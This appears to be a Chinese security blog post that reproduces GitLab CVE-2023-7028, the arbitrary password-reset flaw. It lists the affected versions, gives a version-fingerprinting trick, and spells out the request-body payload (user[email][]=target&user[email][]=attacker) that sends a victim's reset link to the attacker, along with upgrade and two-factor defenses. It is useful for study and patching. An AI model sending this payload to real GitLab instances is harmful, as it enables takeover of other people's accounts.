GitLab任意用户密码重置漏洞(CVE-2023-7028)复现

已于 2024-01-16 14:55:48 修改
阅读量1.7k 收藏 15
点赞数 13
文章标签: gitlab
于 2024-01-13 10:12:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135566325
版权
GitLab官方报告了严重的CVE-2023-7028漏洞,攻击者可通过恶意请求利用忘记密码功能重置他人密码。文章详细描述了漏洞利用条件、复现过程,并提醒用户升级到最新版本或启用二次验证进行防护。
摘要由CSDN通过智能技术生成

漏洞描述

2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。

获取gitlab版本信息

访问/assets/webpack/manifest.json

访问https://github.com/righel/gitlab-version-nse/blob/main/gitlab_hashes.json
比较hash值

漏洞利用条件

1、需获取系统已有用户注册邮箱地址 2、满足影响版本

16.1 <=GitLab CE<16.1.6
16.2 <=GitLab CE<16.2.8
16.3 <=GitLab CE<16.3.6
16.4 <=GitLab CE<16.4.4
16.5 <=GitLab CE<16.5.6
16.6 <=GitLab CE<16.6.4
16.7 <=GitLab CE<16.7.2
16.1 <=GitLab EE<16.1.6
16.2 <=GitLab EE<16.2.8
16.3 <=GitLab EE<16.3.6
16.4 <=GitLab EE<16.4.4
16.5 <=GitLab EE<16.5.6
16.6 <=GitLab EE<16.6.4
16.7 <=GitLab EE<16.7.2

复现过程

这里被找回邮箱为个人注册邮箱地址,真实环境中需先获取目标邮箱地址

访问找回密码页面:/users/password/new

填写被找回邮箱地址,然后点击抓包

修改请求包为:user[email][]=目标邮箱地址&user[email][]=攻击者邮箱地址

user%5Bemail%5D%5B%5D=目标邮箱&user%5Bemail%5D%5B%5D=各位大佬们的邮箱
注意,在bp中符号需要自己编码

成功复现,只要看收信人是两个人,就证明漏洞利用成功,点击重置密码,就可以接管别人账户。

补充

在真实环境中,这个条件必须要有别人邮箱(可以用其他历史漏洞来获取),防御办法很多,比如升级版本,比如二次验证,这个就是二次验证的页面,如果出行这个页面,那就没办法了,这个是动态的验证码,目前还没有什么漏洞暴出来可以利用。

参考链接:https://mp.weixin.qq.com/s/gAU7I2b1fXt0YzNvSxILzQ

感谢大佬提供的无需权限就可以看gitlab的方法。

****************

尽量每天都能复现一个最想的漏洞复现,请持续关注

****************

柯达_
关注
  • 13
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
GitLab升级版本(任意用户密码重置漏洞CVE-2023-7028
weixin_52796198的博客
01-24 1625
最近GitLab发了个紧急漏洞需要修复,ok接到命令立刻着手开始修复,在修复之前先大概了解一下这个漏洞是什么东西。
GitLab存在任意用户密码重置漏洞CVE-2023-7028
qq_32947907的博客
01-16 1024
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。•排查gitlab-rails/production_json.log日志中是否有访问/users/password接口,且参数中包含多个邮件地址。当Gitlab启用邮箱登录、启用SMTP时,向密码重置接口发送payload,此步骤需要掌握一个已知邮箱账户。3)未开启多因素认证。
GitLab 高危漏洞可导致账号遭接管
最新发布
smellycat000的专栏
05-24 227
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个高危漏洞,它可导致未认证攻击者在跨站点脚本攻击中接管用户账户。该漏洞的编号是CVE-2024-4835,是位于VS 代码编辑器 (Web IDE)中的一个XSS弱点,可导致威胁行动者使用恶意构造的页面窃取受限制的信息。虽然攻击者可在无需认证的攻击中利用该漏洞,但仍然需要用户交互,因此增加了攻击的复杂性。GitLab 指出,...
漏洞复现--GitLab 任意用户密码重置漏洞CVE-2023-7028
qq_53003652的博客
01-14 1610
2024年1月11日,Gitlab 官方披露 CVE-2023-7028GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab 仅对可信地址开放。可以看到提示,如果两个邮箱都成功注册过,那么攻击者邮箱将会收到目标用户重置密码邮件。访问找回密码页面:/users/password/new,输入目标邮箱,抓包。
【严重】GitLab 账号接管漏洞
murphysec的博客
01-15 726
GitLab 是由GitLab公司开发的、基于Git的集成软件开发平台。GitLab CE/EE中支持用户通过辅助电子邮件地址重置密码,默认情况允许通过未经确认电子邮件重置密码。攻击者可以利用此漏洞用户帐户密码重置电子邮件发送任意未经验证的电子邮件地址,导致用户帐户被接管。GitLab 账号接管漏洞
登录逻辑漏洞整理集合
qq_56426046的博客
02-21 2422
如果忘记你那么容易,那我爱你干嘛!2、不安全验证邮箱/手机号。3、MVC数据对象自动绑定。4、Unicode字符处理。1.未验证邮箱/手机号。1、cookie未鉴权。5.前端验证审核绕过。2、验证码、密码回显。2、cookie鉴权。
GitLab EE 16.1 Ultimate Crack
控件与插件之大全
06-30 1599
GitLabis The DevSecOps Platform that empowers organizations to deliver software faster, more efficiently, while strengthening security and compliance. GitLab offers git repository management, code reviews, issue tracking, activity feeds and wikis
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———...
前端任意用户登入逻辑漏洞
qq_46487664的博客
07-25 739
2.3 将index.html、login.php和test.html三个文件放入test目录下。3.8点击forword进行重放响应包,发现成功访问了test.html文件,实现登入绕过。3.8再次点击forword,发现304状态码,也就是重定向到了test.html文件。2.1.准备项目文件index.html,login.php,test.html。2.4进入宝塔面板,点击网站,将网站目录修改为/www/wwwroot/test。抓取响应包设置,选择proxy模块,点击options。
渗透测试之任意密码读取漏洞
2301_80115097的博客
10-24 141
没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码
gitlab部署与破解密码
qq_58328312的博客
08-11 1933
部署gitlab至少需要4GB内存来运行在浏览器使用ip访问,部署成功则出现以下页面。
实战| 任意用户密码重置漏洞
zkaqlaoniao的博客
11-22 398
这里只测了四位数,还是在验证没失效,其实从000000-999999 爆过去肯定就能过了【或者找个验证码字典,不过我觉得它肯定是纯数字】这里肯定是有逻辑漏洞危害的,因为密码找回我就爆破成功了。只要logincode带着一个验证码md5加密,后面所有的登陆接口所有操作都可以无视验证码了—>这里的验证码功能等于没有,而且也没有ip访问限制,撞库就得死。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。2.【后面测试的找回密码第一个接口是验证手机号和学号!
任意密码登录——密码找回漏洞
记录并分享学习安全的知识点..
04-15 1334
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞存在的点 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解。 密码找回凭证可从客户端直接获取。 密码找回凭证在页面中可以直接获取。 密码找回凭证存并非只是与单个用户并绑定的问题。 密码找回凭证存并非只是与单个用户并绑定的问题。 用户找回密码的邮箱地址或者手机号码被修改。 在最后提交修改的密码处的逻辑错误。 二、漏洞复现 (一)密码找回凭证存放在cookie中 1.点击.
【技巧分享】Nacos未经授权的登录漏洞-任意密码直接登录后台
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-20 4298
Nacos中发现影响Nacos
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值